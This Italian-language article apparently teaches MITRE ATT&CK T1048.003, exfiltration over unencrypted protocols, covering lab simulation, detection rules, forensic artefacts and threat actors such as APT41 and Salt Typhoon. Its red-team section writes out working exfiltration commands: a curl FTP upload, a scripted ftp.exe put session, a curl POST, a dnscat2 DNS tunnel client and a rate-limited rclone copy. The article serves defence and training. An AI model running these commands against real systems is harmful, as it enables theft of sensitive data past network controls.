Esfiltrazione in Chiaro: Exfiltration Over Unencrypted Non-C2 Protocol (T1048.003)

L'obiettivo in laboratorio è dimostrare quanto sia banale far uscire dati sensibili su protocolli consentiti dal firewall. Non servono exploit: bastano utility native del sistema operativo.

Esfiltrazione via FTP con curl — esattamente come documentato per PUBLOAD, che carica archivi RAR su un server FTP controllato dall'attaccante. In un ambiente lab con un server FTP locale (ad esempio vsftpd), il comando è immediato:

curl -T /tmp/exfil.rar ftp://labuser:labpass@/upload/

Su Windows, il binario nativo ftp.exe è disponibile senza installazioni aggiuntive. Si può scriptare una sessione interattiva con un file di comandi:

echo open > %TEMP%\ftp.txt & echo user labuser labpass >> %TEMP%\ftp.txt & echo binary >> %TEMP%\ftp.txt & echo put C:\staging\data.rar >> %TEMP%\ftp.txt & echo bye >> %TEMP%\ftp.txt & ftp -s:%TEMP%\ftp.txt

Esfiltrazione via HTTP POST — replica il pattern usato da FIN6 per inviare dati di carte di pagamento. Con curl è sufficiente un POST multipart:

curl -X POST -F "file=@/tmp/exfil.tar.gz" /upload

DNS tunneling — la tecnica preferita da APT32 e impiegata da APT41 nella campagna C0017. Lo strumento dnscat2 (open source) permette di incapsulare dati nei campi subdomain delle query DNS. Lato server si avvia il listener, lato client si esegue:

dnscat --dns server=,port=53 --secret=labkey

Per una simulazione più controllata, Rclone (open source) permette di configurare un remote FTP o HTTP WebDAV e trasferire file con un singolo comando:

rclone copy /tmp/staging/ ftpremote:/exfil/ --transfers 1 --bwlimit 100k

Il flag --bwlimit è utile per simulare l'esfiltrazione lenta tipica degli APT che vogliono evitare spike di traffico. Infine, su macOS, WindTail sfrutta il binario nativo /usr/bin/curl — il che dimostra che anche ambienti Apple sono vulnerabili senza alcun tool aggiuntivo.

Un buon report red team dovrebbe documentare quale protocollo ha superato i controlli DLP, a quale velocità, e se il SOC ha generato alert. La differenza tra "l'FTP era aperto" e "abbiamo esfiltrato 2 GB in 40 minuti senza alert" è quella che convince il board ad investire.

La sfida principale con T1048.003 è distinguere traffico di esfiltrazione da traffico legittimo: FTP e HTTP sono protocolli ordinari in molte reti. La detection efficace non si basa sul protocollo in sé, ma sulla correlazione tra accesso ai dati e connessione in uscita.

Windows — la detection AN0423 correla eventi di accesso a file con flussi di rete in uscita su protocolli non cifrati. Le log source fondamentali sono Sysmon e Security EventLog, insieme ai flussi di rete (NSM:Flow). Un alert ad alto valore si costruisce così: quando un processo inatteso — ad esempio winword.exe o powershell.exe — genera una connessione su porta 21 (FTP) o invia HTTP POST verso IP esterni mai contattati prima, è il momento di investigare. Il parametro di tuning ParentProcessDenylist è cruciale: definire quali processi padre non dovrebbero mai lanciare client FTP o HTTP riduce drasticamente i falsi positivi. L'evento Sysmon EventCode 3 (Network Connection) filtrato per porta di destinazione 20-21 o 80, incrociato con EventCode 11 (FileCreate) su directory di staging comuni come %TEMP% o C:\Users\Public, fornisce una regola solida.

Per il DataTransferSizeThreshold, stabilire una baseline per host è essenziale. Un server di sviluppo che normalmente genera 50 MB di traffico HTTP al giorno e improvvisamente ne trasferisce 500 merita attenzione immediata.

Linux — la detection AN0424 si appoggia su auditd e flussi di rete. Il punto di partenza sono le syscall connect e sendto invocate da processi come curl, wget o ftp dopo accesso a directory sensibili. La SensitiveDirectoryWatchlist deve includere percorsi come /etc/, /home/*/Documents/ e qualsiasi path applicativo critico. Una regola auditd efficace:

-w /etc/ -p r -k sensitive_read

Questo genera eventi che, correlati con connessioni in uscita su porte 21 o 80 entro una finestra temporale definita (TimeWindow), producono alert affidabili.

Network Devices — la detection AN0427 è particolarmente rilevante per Salt Typhoon, che esfiltra configurazioni di apparati di rete via FTP e TFTP. Monitorare i log CLI per comandi come copy running-config ftp: o archive tar diretti verso IP esterni non autorizzati è un controllo spesso trascurato. Il DestinationIPBlocklist dovrebbe includere qualsiasi IP esterno alla rete di gestione.

Sul fronte preventivo, le mitigazioni M1057 (Data Loss Prevention) e M1037 (Filter Network Traffic) sono complementari: la prima ispeziona il contenuto in transito cercando pattern PII o dati finanziari, la seconda impone che protocolli come DNS e FTP transitino esclusivamente attraverso server dedicati e proxy, impedendo connessioni dirette dagli endpoint.

L'analisi forense di un'esfiltrazione via protocolli non cifrati ha un vantaggio enorme rispetto a canali cifrati: il contenuto è potenzialmente ispezionabile nelle catture di rete. Il rovescio della medaglia è che bisogna sapere dove cercare.

Artefatti Windows — la ricostruzione parte dal registro Sysmon. Gli eventi EventCode 1 (ProcessCreate) rivelano l'esecuzione di ftp.exe, curl.exe o bitsadmin.exe con argomenti che includono IP esterni o credenziali. BITSAdmin è particolarmente insidioso perché i BITS Jobs persistono nel sistema: il database BITS si trova in C:\ProgramData\Microsoft\Network\Downloader\qmgr.db e può essere estratto con tool come BitsParser (open source) per ricostruire upload e download storici. Le Prefetch (C:\Windows\Prefetch\FTP.EXE-*.pf) confermano l'esecuzione anche se i log Sysmon sono stati cancellati, mentre la MFT Timeline rivela la creazione di file temporanei nelle directory di staging.

Per la campagna C0017, dove APT41 ha codificato dati PII nei sottodomini DNS, gli artefatti chiave sono i log DNS del resolver locale e la cache DNS del client. Su Windows, un export della cache prima che venga svuotata si ottiene con:

ipconfig /displaydns > C:\forensics\dns_cache.txt

I record con sottodomini anomalamente lunghi o con pattern Base64 sono indicatori forti di tunneling DNS.

Artefatti Linux — i log auditd catturano le syscall di rete (connect, sendto) con PID e path del binario. Il file ~/.bash_history o equivalente spesso conserva comandi curl --upload-file o sessioni ftp manuali, come documentato per CookieMiner e Dok. La directory /tmp/ è un punto di staging frequente: Dok vi salva log di esecuzione prima di esfiltrare via FTP, quindi la verifica dei timestamp su file in /tmp/ con stat è prioritaria.

macOS — per WindTail il focus è su /usr/bin/curl. I log Unified (log show --predicate 'process == "curl"') forniscono timestamp e argomenti. Il tool osquery (open source), se installato, permette query retrospettive su processi e connessioni di rete con la tabella process_open_sockets.

Rete — se esistono catture PCAP del periodo dell'intrusione, l'analisi di sessioni FTP in chiaro con Wireshark (open source) è diretta: i comandi STOR rivelano nomi di file esfiltrati, le credenziali transitano in chiaro nei comandi USER e PASS. Per HTTP, i POST body verso destinazioni esterne contengono spesso i dati grezzi o codificati in Base64 — Zeek (open source) genera log http.log con dimensioni dei payload che facilitano l'identificazione di trasferimenti anomali.

La timeline forense ideale correla tre livelli: accesso al file sensibile (timestamp NTFS/ext4), creazione dell'archivio (RAR/ZIP nella directory di staging), e sessione di rete in uscita (PCAP o log NSM). Quando questi tre eventi cadono in una finestra temporale ristretta, la catena probatoria è solida.

Il panorama degli attori che utilizzano T1048.003 rivela un pattern chiaro: l'esfiltrazione su protocolli non cifrati non è una scelta da gruppi poco sofisticati, ma una decisione tattica deliberata che attraversa livelli di capability molto diversi.

Lazarus Group (G0032) impiega SMTP per notificare nuove infezioni via email attraverso il malware SierraBravo-Two. L'uso di un protocollo di comunicazione ordinario come la posta elettronica per esfiltrare dati sulle vittime è una scelta che sfrutta la quasi-impossibilità di distinguere traffico SMTP malevolo in organizzazioni con alto volume di email in uscita. Il gruppo è noto per operazioni finanziarie e di spionaggio legate alla DPRK.

APT32 (G0050), gruppo legato al Vietnam, codifica dati nei sottodomini DNS tramite la propria backdoor — un metodo condiviso con APT41 nella campagna C0017 (maggio 2021 – febbraio 2022), dove i dati PII esfiltrati da almeno sei reti governative statunitensi venivano prepended come sottodomini al dominio controllato dall'attaccante. Questa convergenza tecnica tra gruppi di diversa affiliazione statale conferma che il DNS tunneling è diventato uno standard operativo cross-APT.

Salt Typhoon (G1045), gruppo associato alla Cina, si distingue per un target specifico: configurazioni di dispositivi di rete, esfiltrando via FTP e TFTP. Questo profilo di esfiltrazione suggerisce operazioni di ricognizione infrastrutturale a lungo termine, dove le configurazioni di router e switch forniscono mapping completi dell'architettura target.

OilRig (G0049), legato all'Iran, adotta un approccio multi-canale esfiltrando sia via Microsoft Exchange che via FTP, separatamente dal C2 primario su DNS. Questa ridondanza nei canali di esfiltrazione è un indicatore di maturità operativa: se un canale viene bloccato, l'altro resta attivo.

Sul versante cybercriminale, FIN6 (G0037) e FIN8 (G0061) preferiscono metodi diretti — HTTP POST per dati di carte di pagamento nel caso di FIN6, FTP per FIN8. Wizard Spider (G0102) e Contagious Interview (G1052) confermano FTP come protocollo dominante nel settore e-crime. Mustang Panda (G0129) lo utilizza per archivi compressi, affiancato dal malware PUBLOAD che automatizza l'upload di RAR contenenti documenti Office e PDF via curl.

Il trend emergente è la separazione fisica tra infrastruttura C2 e infrastruttura di esfiltrazione — un'architettura osservata in CosmicDuke, Remsec e nelle operazioni di OilRig. Per il threat intelligence, questo significa che bloccare il C2 non interrompe necessariamente la perdita di dati: l'esfiltrazione può proseguire su un canale completamente indipendente.

Framework MITRE ATT&CK v16 — Tecnica T1048.003, Tattica TA0010, Campagna C0017. Mitigazioni M1031, M1057, M1037, M1030. Detection AN0423–AN0427. Integrato con conoscenza professionale per tool e procedure operative.